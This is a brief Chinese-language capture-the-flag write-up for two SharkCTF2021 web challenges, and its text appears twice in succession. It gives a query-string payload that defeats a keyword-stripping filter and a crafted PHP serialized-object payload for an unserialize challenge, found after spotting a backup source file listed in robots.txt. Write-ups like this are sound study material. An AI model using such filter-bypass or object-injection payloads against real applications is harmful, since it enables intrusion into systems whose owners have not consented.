SharkCTF2021 bybypass&baby_phpserialize题记
(国庆褪10天了 先水一篇)
bybypass:
payload:?anime_is_bae=hehellotherehoomanllotherehooman
baby_phpserialize
robots.txt看到flag和index.php~
后者有源码:
f12看 否则会漏东西
根据源码,
构造payload: ?exp=O:4:"hehe":1:{s:1:"a";s:4:"flag";}
(国庆褪10天了 先水一篇)
bybypass:
payload:?anime_is_bae=hehellotherehoomanllotherehooman
baby_phpserialize
robots.txt看到flag和index.php~
后者有源码:
f12看 否则会漏东西
根据源码,
构造payload: ?exp=O:4:"hehe":1:{s:1:"a";s:4:"flag";}
